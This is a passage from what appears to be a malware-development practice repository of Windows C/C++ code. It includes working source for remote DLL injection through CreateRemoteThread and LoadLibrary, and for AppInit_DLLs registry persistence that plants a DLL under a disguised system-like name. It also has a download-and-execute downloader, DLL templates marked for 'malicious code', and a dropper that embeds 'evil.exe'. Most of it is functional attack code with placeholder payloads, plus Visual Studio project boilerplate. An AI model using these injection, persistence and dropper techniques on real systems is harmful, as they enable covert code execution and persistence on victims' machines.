80 | PostThreadMessage(threadID, WM_NULL, NULL, NULL);
81 |
82 | // Waiting for user input to remove the hook
83 | cout << "[ OK ] Hook set and triggered." << endl;
84 | cout << "[ >> ] Press any key to unhook (This will unload the DLL)." << endl;
85 | system("pause > nul");
86 |
87 | // Unhooking
88 | BOOL unhook = UnhookWindowsHookEx(handle);
89 | if (unhook == FALSE) {
90 | cout << "[ FAILED ] Could not remove the hook." << endl; return EXIT_FAILURE;
91 | }
92 |
93 | cout << "[ OK ] Done. Press any key to exit." << endl;
94 | system("pause > nul");
95 | return EXIT_SUCCESS;
96 |
97 | getchar();
98 | return 0;
99 | }
--------------------------------------------------------------------------------
/process-injection/registry-modification/registry-modification.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 |
4 | /*
5 | ** Injection And Persistence Via Registry Modification
6 | ** - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
7 | */
8 |
9 | void SetStringValueKey(HKEY hKey, LPCSTR keyName, const char *path)
10 | {
11 | RegSetValueEx(hKey, keyName, 0, REG_SZ, (BYTE*)path, strlen(path));
12 | }
13 | void SetDWORDValueKey(HKEY hKey, LPCSTR keyName, DWORD data)
14 | {
15 | RegSetValueEx(hKey, keyName, 0, REG_DWORD, (LPBYTE)&data, sizeof(DWORD));
16 | }
17 |
18 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
19 | {
20 | #if 1 // Registry Modification
21 | HKEY hKey1, hKey2;
22 | long regOpenResult1, regOpenResult2;
23 |
24 | LPCTSTR lpSubKey1 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
25 | LPCTSTR lpSubKey2 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
26 |
27 | regOpenResult1 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey1, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey1);
28 | regOpenResult2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey2, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey2);
29 |
30 | const char path[] = "C:\\ProgramData\\Microsoft\\Network\\MSNetworkService.dll";
31 | CopyFile("testLibs.dll", path, true);
32 | DWORD data = 1;
33 |
34 | LPCSTR keyName1 = "Appinit_Dlls";
35 | SetStringValueKey(hKey1, keyName1, path);
36 | SetStringValueKey(hKey2, keyName1, path);
37 |
38 | LPCSTR keyName2 = "LoadAppInit_DLLs";
39 | SetDWORDValueKey(hKey1, keyName2, data);
40 | SetDWORDValueKey(hKey2, keyName2, data);
41 |
42 | RegCloseKey(hKey1);
43 | RegCloseKey(hKey2);
44 |
45 | MessageBox(NULL, "Hello!!", "Hellu!!", MB_OK);
46 | #endif // Registry Modification
47 |
48 | #if 0 // Registry set Default
49 | HKEY hKey1, hKey2;
50 | long regOpenResult1, regOpenResult2;
51 |
52 | LPCTSTR lpSubKey1 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
53 | LPCTSTR lpSubKey2 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
54 |
55 | regOpenResult1 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey1, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey1);
56 | regOpenResult2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey2, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey2);
57 |
58 | DeleteFile("C:\\ProgramData\\Microsoft\\Network\\MSNetworkService.dll");
59 | DWORD data = 0;
60 |
61 | LPCSTR keyName1 = "Appinit_Dlls";
62 | SetStringValueKey(hKey1, keyName1, "");
63 | SetStringValueKey(hKey2, keyName1, "");
64 |
65 | LPCSTR keyName2 = "LoadAppInit_DLLs";
66 | SetDWORDValueKey(hKey1, keyName2, data);
67 | SetDWORDValueKey(hKey2, keyName2, data);
68 |
69 | RegCloseKey(hKey1);
70 | RegCloseKey(hKey2);
71 |
72 | MessageBox(NULL, "#_Funny!!", "#_Funny!!", MB_OK);
73 | #endif // Registry set Default
74 |
75 | return 0;
76 | }
--------------------------------------------------------------------------------
/process-injection/remote-dll-injection/dll-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Classic Dll Injection Via Createremotethread And Loadlibrary
9 | ** Reference:
10 | ** [1] - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
11 | ** [2] - https://github.com/Zer0Mem0ry/StandardInjection
12 | ** [3] - https://github.com/saeedirha/DLL-Injector
13 | ** [4] - https://attack.mitre.org/wiki/Technique/T1055
14 | */
15 |
16 | // Get The Process ID
17 | DWORD GetProcessID(const char* procname)
18 | {
19 | PROCESSENTRY32 pe;
20 | HANDLE hSnap;
21 |
22 | pe.dwSize = sizeof(PROCESSENTRY32);
23 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
24 | if (Process32First(hSnap, &pe)) {
25 | do
26 | {
27 | if (strcmp(pe.szExeFile, procname) == 0)
28 | break;
29 | } while (Process32Next(hSnap, &pe));
30 | }
31 | return pe.th32ProcessID;
32 | }
33 |
34 | int main(int argc, char const *argv[])
35 | {
36 | char strTmp[256], ProcessName[256], dllPathTmp[512];
37 | // Process running Input
38 | cout << "Example: crackme, basecalc,..." << endl;
39 | cout << "Enter Process Name: "; rewind(stdin);
40 | cin.getline(strTmp, sizeof(strTmp));
41 | strcpy(ProcessName, strcat(strTmp, ".exe"));
42 |
43 | // DLL Path Input
44 | cout << "Enter DLL Path: ";
45 | cin.getline(dllPathTmp, sizeof(dllPathTmp));
46 |
47 | // Starting Injection
48 | cout << "[ Starting ] Classic Dll Injection Via Createremotethread And Loadlibrary" << endl;
49 |
50 | // DLL Path
51 | LPCSTR DllPath = dllPathTmp;
52 |
53 | // Open Target Proccess
54 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetProcessID(ProcessName));
55 |
56 | // Allocate DllPath inside Target Proccess
57 | LPVOID pDllPath = VirtualAllocEx(hProcess, 0, strlen(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
58 |
59 | // Write DllPath into the memory address space allocated
60 | WriteProcessMemory(hProcess, pDllPath, (LPVOID)DllPath, strlen(DllPath) + 1, 0);
61 |
62 | // Create RemoteThread and call DLL
63 | HANDLE hLoadThread = CreateRemoteThread(hProcess, 0, 0,
64 | (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"),
65 | "LoadLibraryA"), pDllPath, 0, 0);
66 |
67 | // Loading
68 | WaitForSingleObject(hLoadThread, INFINITE);
69 |
70 | // Allocated at
71 | cout << "[ OK ] Dll path allocated at: " << hex << pDllPath << endl;
72 |
73 | // Giải phóng vùng nhớ cấp cho DllPath
74 | VirtualFreeEx(hProcess, pDllPath, strlen(DllPath) + 1, MEM_RELEASE);
75 |
76 | cout << "[ OK ] Classic Dll Injection is Successful!!" << endl;
77 | cout << "[ EXIT ] Press any key to exit." << endl;
78 |
79 | getchar();
80 | return 0;
81 | }
--------------------------------------------------------------------------------
/process-injection/test-lib/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/dllmain.cpp
--------------------------------------------------------------------------------
/process-injection/test-lib/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/stdafx.cpp
--------------------------------------------------------------------------------
/process-injection/test-lib/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/stdafx.h
--------------------------------------------------------------------------------
/process-injection/test-lib/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/targetver.h
--------------------------------------------------------------------------------
/process-injection/test-lib/testLibs.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/testLibs.cpp
--------------------------------------------------------------------------------
/process-injection/test-messagebox/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/stdafx.cpp
--------------------------------------------------------------------------------
/process-injection/test-messagebox/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/stdafx.h
--------------------------------------------------------------------------------
/process-injection/test-messagebox/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/targetver.h
--------------------------------------------------------------------------------
/process-injection/test-messagebox/testMessageBox.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/testMessageBox.cpp
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dll-no-export.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dll-no-export.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include
3 | #pragma comment(lib, "User32.Lib")
4 |
5 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
6 | {
7 | if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
8 | MessageBoxA(0, "This is DllMain.", "Simple DLL", MB_OK | MB_ICONWARNING);
9 | }
10 | return TRUE;
11 | }
12 |
13 | /*
14 | ** Visual Studio Configuration Precompiled Header
15 | ** Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
16 | ** => Removed header file and other files generated by VS. Keep only dllmain.cpp or dllmain.c
17 | */
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dll-with-exported.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dll-with-exported.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include
3 | #include
4 | #include
5 | #pragma warning(disable : 4996)
6 | #pragma comment(lib, "User32.Lib")
7 |
8 | #define DllExport __declspec(dllexport)
9 |
10 | int sum(int a, int b) {
11 | return a + b;
12 | }
13 |
14 | int mul(int a, int b) {
15 | return a * b;
16 | }
17 |
18 | DllExport void func() {
19 | char buffer[50] = { 0 };
20 | int a = 11, b = 9;
21 | // Implement malicious code in exported function
22 | sprintf(buffer, "This is func() exported.\n%d * %d = %d", a, b, mul(a, b));
23 | MessageBoxA(0, buffer, "func", MB_OK | MB_ICONWARNING);
24 | }
25 |
26 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
27 | {
28 | if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
29 | // Implement malicious code in DllMain function
30 | char buffer[50] = { 0 };
31 | int a = 10, b = 9;
32 | sprintf(buffer, "This is DllMain.\n%d + %d = %d", a, b, sum(a, b));
33 | MessageBoxA(0, buffer, "DllMain", MB_OK | MB_ICONWARNING);
34 | }
35 | return TRUE;
36 | }
37 |
38 | /*
39 | ** VS Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
40 | ** VS Project > Properties > Linker > All Option > General Debug Info > No
41 | ** Removed header file and other files generated by VS. Keep only dllmain.cpp or dllmain.c
42 | ** Ref:
43 | ** 1. MSDN - dllexport, dllimport
44 | https://docs.microsoft.com/en-us/cpp/cpp/dllexport-dllimport
45 | */
46 |
--------------------------------------------------------------------------------
/simple-dll/release/x64/dll-no-export.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dll/release/x64/dll-no-export.zip
--------------------------------------------------------------------------------
/simple-dll/release/x64/dll-with-exported.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dll/release/x64/dll-with-exported.zip
--------------------------------------------------------------------------------
/simple-dll/simple-dll.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dll-no-export", "dll-no-export\dll-no-export.vcxproj", "{4691A5A1-0C3E-4D47-90C2-482181364CA7}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dll-with-exported", "dll-with-exported\dll-with-exported.vcxproj", "{5327F2AB-E9E0-4DA4-8183-31C0978B2921}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Debug|x64.ActiveCfg = Debug|x64
19 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Debug|x86.ActiveCfg = Debug|Win32
20 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x64.ActiveCfg = Release|x64
21 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x64.Build.0 = Release|x64
22 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x86.ActiveCfg = Release|Win32
23 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x86.Build.0 = Release|Win32
24 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Debug|x64.ActiveCfg = Debug|x64
25 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Debug|x86.ActiveCfg = Debug|Win32
26 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x64.ActiveCfg = Release|x64
27 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x64.Build.0 = Release|x64
28 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x86.ActiveCfg = Release|Win32
29 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x86.Build.0 = Release|Win32
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {7D094A03-77EF-494B-B69E-DEDF283F1102}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/simple-downloader/release/x64/simple-downloader.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-downloader/release/x64/simple-downloader.zip
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-downloader", "simple-downloader\simple-downloader.vcxproj", "{84567241-CBF3-4F80-947F-B819D01EFC11}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Debug|x64.ActiveCfg = Debug|x64
17 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Debug|x86.ActiveCfg = Debug|Win32
18 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x64.ActiveCfg = Release|x64
19 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x64.Build.0 = Release|x64
20 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x86.ActiveCfg = Release|Win32
21 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {93053CBE-437D-496B-84F6-F30D3FDB21AD}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "Urlmon.Lib")
6 | #pragma comment(lib, "User32.Lib")
7 | #pragma comment(lib, "shell32.lib")
8 |
9 |
10 | int main()
11 | {
12 | TCHAR url[] = TEXT("http://github.com/fluidicon.png");
13 | TCHAR filePath[MAX_PATH];
14 |
15 | // Current working directory
16 | GetCurrentDirectoryW(MAX_PATH, filePath);
17 |
18 | // Format path to save downloaded file
19 | wsprintfW(filePath, TEXT("%s\\fluidicon.png"), filePath);
20 |
21 | // Download file from url
22 | HRESULT hRes = URLDownloadToFileW(NULL, url, filePath, 0, NULL);
23 | Sleep(400);
24 |
25 | // Print result
26 | if (hRes == S_OK) {
27 | printf(" [+] File download successfully.\n");
28 | Sleep(400);
29 | printf(" [+] Saved to: %ls\n", filePath);
30 | Sleep(400);
31 | printf(" [+] Executing file dropped..!");
32 | Sleep(400);
33 |
34 | // Open file downloaded using ShellExecuteA() API.
35 | ShellExecuteW(NULL, L"open", filePath, NULL, NULL, 1);
36 | }
37 | else if (hRes == E_OUTOFMEMORY) {
38 | printf(" [-] The buffer length is invalid.\n");
39 | }
40 | else if (hRes == INET_E_DOWNLOAD_FAILURE) {
41 | printf(" [-] The specified resource or callback interface was invalid.\n");
42 | }
43 | else {
44 | printf(" [-] Unknown Error!\n");
45 | }
46 |
47 | return 0;
48 | }
49 |
50 | /*
51 | ** Ref:
52 | ** 1. MSDN
53 | ** https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
54 | ** 2. Should I use URLDownloadToFile?
55 | ** https://stackoverflow.com/a/5185008
56 | */
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dropper/release/x64/simple-dropper.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/release/x64/simple-dropper.zip
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-dropper", "simple-dropper\simple-dropper.vcxproj", "{9DA0471C-75DF-43B3-B786-9E2A6FAD4377}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Debug|x64.ActiveCfg = Debug|x64
17 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Debug|x86.ActiveCfg = Debug|Win32
18 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x64.ActiveCfg = Release|x64
19 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x64.Build.0 = Release|x64
20 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x86.ActiveCfg = Release|Win32
21 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {7885CE95-A1D5-4372-8D46-962DD1DE8B50}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/bin/evil.exe
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/bin/fluidicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/bin/fluidicon.png
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by simple-dropper.rc
4 | //
5 | #define IDR_BIN1 101
6 | #define IDB_PNG1 102
7 |
8 | // Next default values for new objects
9 | //
10 | #ifdef APSTUDIO_INVOKED
11 | #ifndef APSTUDIO_READONLY_SYMBOLS
12 | #define _APS_NEXT_RESOURCE_VALUE 103
13 | #define _APS_NEXT_COMMAND_VALUE 40001
14 | #define _APS_NEXT_CONTROL_VALUE 1001
15 | #define _APS_NEXT_SYMED_VALUE 101
16 | #endif
17 | #endif
18 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/simple-dropper.aps
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 |
56 | /////////////////////////////////////////////////////////////////////////////
57 | //
58 | // PNG
59 | //
60 |
61 | IDB_PNG1 PNG "bin\\fluidicon.png"
62 |
63 | #endif // English (United States) resources
64 | /////////////////////////////////////////////////////////////////////////////
65 |
66 |
67 |
68 | #ifndef APSTUDIO_INVOKED
69 | /////////////////////////////////////////////////////////////////////////////
70 | //
71 | // Generated from the TEXTINCLUDE 3 resource.
72 | //
73 |
74 |
75 | /////////////////////////////////////////////////////////////////////////////
76 | #endif // not APSTUDIO_INVOKED
77 |
78 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-encryption/release/x64/simple-encryption.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-encryption/release/x64/simple-encryption.zip
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-encryption", "simple-encryption\simple-encryption.vcxproj", "{0306B084-8237-4C80-B697-1C8C1222E120}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {0306B084-8237-4C80-B697-1C8C1222E120}.Debug|x64.ActiveCfg = Debug|x64
17 | {0306B084-8237-4C80-B697-1C8C1222E120}.Debug|x86.ActiveCfg = Debug|Win32
18 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x64.ActiveCfg = Release|x64
19 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x64.Build.0 = Release|x64
